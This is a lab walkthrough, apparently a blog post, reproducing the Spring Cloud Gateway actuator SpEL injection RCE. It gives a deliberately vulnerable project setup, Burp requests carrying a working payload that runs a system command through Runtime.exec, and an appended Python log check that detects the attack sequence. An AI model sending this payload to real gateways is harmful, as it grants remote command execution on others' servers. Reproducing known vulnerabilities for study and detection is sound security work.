
Reproducing the Spring Cloud Gateway RCE vulnerability in IDEA

2024-07-31 | Java
Let's first go over some basics.

Spring Cloud microservice architecture

Spring Cloud is an open-source microservice architecture solution built on the Spring Framework. It splits one large monolithic application into several or even dozens of small microservice applications that can be developed, managed and iterated independently. Spring Cloud provides a set of tools and frameworks that help developers build and deploy microservice applications quickly. Its main characteristics are microservice support, openness and extensibility, high availability and fault tolerance, and deployment on a cloud-native architecture.

Spring Cloud Gateway (gateway service) concept:

Spring Boot Actuator (monitoring component):

Actuator endpoints for operating the gateway:

Now let's start the reproduction:

First, replace the pom.xml dependencies:

<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd">
	<modelVersion>4.0.0</modelVersion>
	<parent>
		<groupId>org.springframework.boot</groupId>
		<artifactId>spring-boot-starter-parent</artifactId>
		<!-- If the SNAPSHOT builds no longer resolve, the release versions 2.6.3 (Boot) and 2021.0.1 (Cloud) work the same way, because the gateway server version is pinned below. -->
		<version>2.6.3-SNAPSHOT</version>
		<relativePath/> <!-- lookup parent from repository -->
	</parent>
	<groupId>com.wuya</groupId>
	<artifactId>spring-gateway-rce</artifactId>
	<version>0.0.1</version>
	<name>spring-gateway-rce</name>
	<description>spring gateway env for rce</description>
	<properties>
		<java.version>1.8</java.version>
		<spring-cloud.version>2021.0.1-SNAPSHOT</spring-cloud.version>
	</properties>
	<dependencies>
		<dependency>
			<groupId>org.springframework.cloud</groupId>
			<artifactId>spring-cloud-starter-gateway</artifactId>
		</dependency>

<!--		Pin the gateway server to the vulnerable 3.1.0. -->
<!--		If it is not pinned, the BOM resolves it to 3.1.1-SNAPSHOT, which is the fixed line. -->
		<dependency>
			<groupId>org.springframework.cloud</groupId>
			<artifactId>spring-cloud-gateway-server</artifactId>
			<version>3.1.0</version>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter</artifactId>
		</dependency>

		<dependency>
			<groupId>org.springframework.boot</groupId>
			<artifactId>spring-boot-starter-test</artifactId>
			<scope>test</scope>
		</dependency>

		<!-- Actuator provides the /actuator/gateway/* endpoints the attack goes through. -->
		<dependency>
		    <groupId>org.springframework.boot</groupId>
		    <artifactId>spring-boot-starter-actuator</artifactId>
		</dependency>
	</dependencies>
	<dependencyManagement>
		<dependencies>
			<dependency>
				<groupId>org.springframework.cloud</groupId>
				<artifactId>spring-cloud-dependencies</artifactId>
				<version>${spring-cloud.version}</version>
				<type>pom</type>
				<scope>import</scope>
			</dependency>
		</dependencies>
	</dependencyManagement>

	<build>
		<plugins>
			<plugin>
				<groupId>org.springframework.boot</groupId>
				<artifactId>spring-boot-maven-plugin</artifactId>
			</plugin>
		</plugins>
	</build>
	<repositories>
		<repository>
			<id>spring-milestones</id>
			<name>Spring Milestones</name>
			<url>https://repo.spring.io/milestone</url>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</repository>
		<repository>
			<id>spring-snapshots</id>
			<name>Spring Snapshots</name>
			<url>https://repo.spring.io/snapshot</url>
			<releases>
				<enabled>false</enabled>
			</releases>
		</repository>
	</repositories>
	<pluginRepositories>
		<pluginRepository>
			<id>spring-milestones</id>
			<name>Spring Milestones</name>
			<url>https://repo.spring.io/milestone</url>
			<snapshots>
				<enabled>false</enabled>
			</snapshots>
		</pluginRepository>
		<pluginRepository>
			<id>spring-snapshots</id>
			<name>Spring Snapshots</name>
			<url>https://repo.spring.io/snapshot</url>
			<releases>
				<enabled>false</enabled>
			</releases>
		</pluginRepository>
	</pluginRepositories>

</project>

Next, write application.properties, GatewayAppTests.java and GatewayApp.java in turn:

# src/main/resources/application.properties
spring.application.name=gateway-demo
server.port=9000
# Enabling and exposing the gateway actuator endpoint over HTTP is the precondition for this attack.
management.endpoint.gateway.enabled=true
management.endpoints.web.exposure.include=gateway
// src/test/java/wuya/GatewayAppTests.java
package wuya;

import org.junit.jupiter.api.Test;
import org.springframework.boot.test.context.SpringBootTest;

@SpringBootTest
class GatewayAppTests {

	@Test
	void contextLoads() {
	}

}
// src/main/java/wuya/GatewayApp.java
package wuya;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;
import org.springframework.cloud.gateway.route.RouteLocator;
import org.springframework.cloud.gateway.route.builder.RouteLocatorBuilder;
import org.springframework.context.annotation.Bean;
import org.springframework.web.bind.annotation.RequestMapping;
import org.springframework.web.bind.annotation.RestController;

@SpringBootApplication
@RestController
public class GatewayApp {

	@RequestMapping("/")
	public String root() {
		return "gateway up and running!";
	}

	// Two ordinary routes so the gateway has something to proxy; they play no
	// part in the vulnerability itself.
	@Bean
	RouteLocator testRouteLocator(RouteLocatorBuilder routeLocatorBuilder) {
		return routeLocatorBuilder.routes()
				.route("test", r -> r.path("/test/**").filters(f -> f.rewritePath("/test(?<path>.*)", "/${path}")).uri("https://www.baidu.com"))
				.route("get", r -> r.path("/get/**").filters(f -> f.addRequestHeader("X-Gateway-Test", "foo")).uri("https://httpbin.org")).build();
	}

	public static void main(String[] args) {
		SpringApplication.run(GatewayApp.class, args);
	}

}

Preparation is done: start the service by running GatewayApp.java.

Since this is a local test, we simply open local port 9000 in the browser:

Started successfully.

Next, open Burp Suite and go to Repeater:

First we add a route. Note that the route id comes from the URL path (hacktest here); the "id" field in the JSON body is overwritten by the server:

Success

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: localhost:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "6666",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

Step two, refresh the routes so the gateway rebuilds them from the stored definitions:

Success

POST /actuator/gateway/refresh HTTP/1.1
Host: localhost:9000
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: keep-alive
Content-Length: 3
Content-Type: application/x-www-form-urlencoded
Origin: null
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0

a=1

Final step: read the route back by its id (GET /actuator/gateway/routes/hacktest):

The returned route now carries the output of the command we injected when adding the route: the gateway evaluated the SpEL expression in the filter argument while rebuilding the routes on refresh, and stored the result in place of the expression:

Summary:

Scanning and remediation:
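On the detection side, as an added example that is not part of the original article: the walkthrough's three requests form a recognisable sequence in access logs (one client POSTs a route definition, POSTs a refresh, then GETs the same route back), so a log check can flag it. SAMPLE_LOG below is constructed in common-log-format style, as a reverse proxy in front of the gateway would write it; the log regex and the five-minute window are assumptions to adjust to your own environment.

```python
"""Added example (not from the original article): flag the
POST route -> POST refresh -> GET route sequence in access logs.
SAMPLE_LOG is constructed here and not taken from any real system."""
import re
from datetime import datetime, timedelta

# Assumed common-log-format line; adjust to the log source you actually have.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
ROUTE_RE = re.compile(r"^/actuator/gateway/routes/(?P<id>[^/?]+)$")
REFRESH_PATH = "/actuator/gateway/refresh"
WINDOW = timedelta(minutes=5)  # assumption: the three steps are normally seconds apart

# Constructed sample: one attacker sequence plus ordinary traffic from another client.
SAMPLE_LOG = """\
203.0.113.10 - - [31/Jul/2024:10:15:01 +0800] "POST /actuator/gateway/routes/hacktest HTTP/1.1" 201 0
203.0.113.10 - - [31/Jul/2024:10:15:03 +0800] "POST /actuator/gateway/refresh HTTP/1.1" 200 0
203.0.113.10 - - [31/Jul/2024:10:15:05 +0800] "GET /actuator/gateway/routes/hacktest HTTP/1.1" 200 214
203.0.113.10 - - [31/Jul/2024:10:15:07 +0800] "DELETE /actuator/gateway/routes/hacktest HTTP/1.1" 200 0
198.51.100.7 - - [31/Jul/2024:10:16:00 +0800] "GET /actuator/gateway/routes HTTP/1.1" 200 1532
198.51.100.7 - - [31/Jul/2024:10:16:02 +0800] "GET /get/anything HTTP/1.1" 200 512
"""


def parse_line(line):
    """Parse one access-log line into a dict, or None if it does not match LOG_RE."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def analyze(lines, window=WINDOW):
    """Return {"writes": [...], "sequences": [...]}.

    writes: every POST/DELETE to /actuator/gateway/routes/<id>; route definitions
    being changed through the actuator at all deserves an alert on its own.
    sequences: POST route -> POST refresh -> GET the same route from the same
    client within `window`, i.e. the exact shape of the exploitation walkthrough.
    """
    writes, sequences, pending = [], [], {}
    for rec in filter(None, map(parse_line, lines)):
        m = ROUTE_RE.match(rec["path"])
        key = (rec["ip"], m["id"]) if m else None
        if m and rec["method"] in ("POST", "DELETE"):
            writes.append({"ip": rec["ip"], "route_id": m["id"],
                           "method": rec["method"], "at": rec["ts"]})
            if rec["method"] == "POST":
                pending[key] = {"written": rec["ts"], "refreshed": False}
        elif rec["path"] == REFRESH_PATH and rec["method"] == "POST":
            # A refresh from the same client arms every route it wrote recently.
            for (ip, _), state in pending.items():
                if ip == rec["ip"] and rec["ts"] - state["written"] <= window:
                    state["refreshed"] = True
        elif m and rec["method"] == "GET":
            state = pending.get(key)
            if state and state["refreshed"] and rec["ts"] - state["written"] <= window:
                sequences.append({"ip": rec["ip"], "route_id": m["id"], "at": rec["ts"]})
                del pending[key]
    return {"writes": writes, "sequences": sequences}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG.splitlines())
    for w in result["writes"]:
        print("route write: %s %s by %s at %s" % (w["method"], w["route_id"], w["ip"], w["at"]))
    for s in result["sequences"]:
        print("possible gateway RCE sequence: route %s by %s at %s" % (s["route_id"], s["ip"], s["at"]))
```

Any POST or DELETE to /actuator/gateway/routes/<id> from outside the deployment is already worth an alert, since route definitions are administrative state; the full sequence is the high-confidence signal. Request bodies, where the #{...} SpEL expression would be visible, are usually not logged, so the check relies on paths and ordering only.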
